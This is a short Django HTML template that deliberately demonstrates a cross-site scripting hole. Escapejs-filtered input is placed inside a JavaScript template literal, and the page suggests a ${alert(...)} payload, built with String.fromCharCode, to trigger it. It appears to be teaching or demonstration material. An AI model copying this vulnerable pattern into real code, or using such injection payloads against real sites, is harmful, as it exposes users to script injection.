<html>

<body>
    <h1>Sample XSS Exploit From Unvalidated Use of escapejs</h1>
    <p>Hi<span id='name_here'>,</span></p>
    <form action='.' method='POST'>
        {% csrf_token %}
        <label for='name'>Add your name</label>
        <input type='text' name='name' id='name' />
        <button type='submit'>Submit</button>
    </form>

    <p>To trigger the bug try setting your name to <kbd>${alert(String.fromCharCode(88) + String.fromCharCode(83) +
            String.fromCharCode(83))}</kbd></p>
    <script type='text/javascript'>
        var name = `{{name|escapejs}}`;
        if (name) { name = " " + name };
        var el = document.getElementById('name_here');
        el.textContent = name;
    </script>
</body>

</html>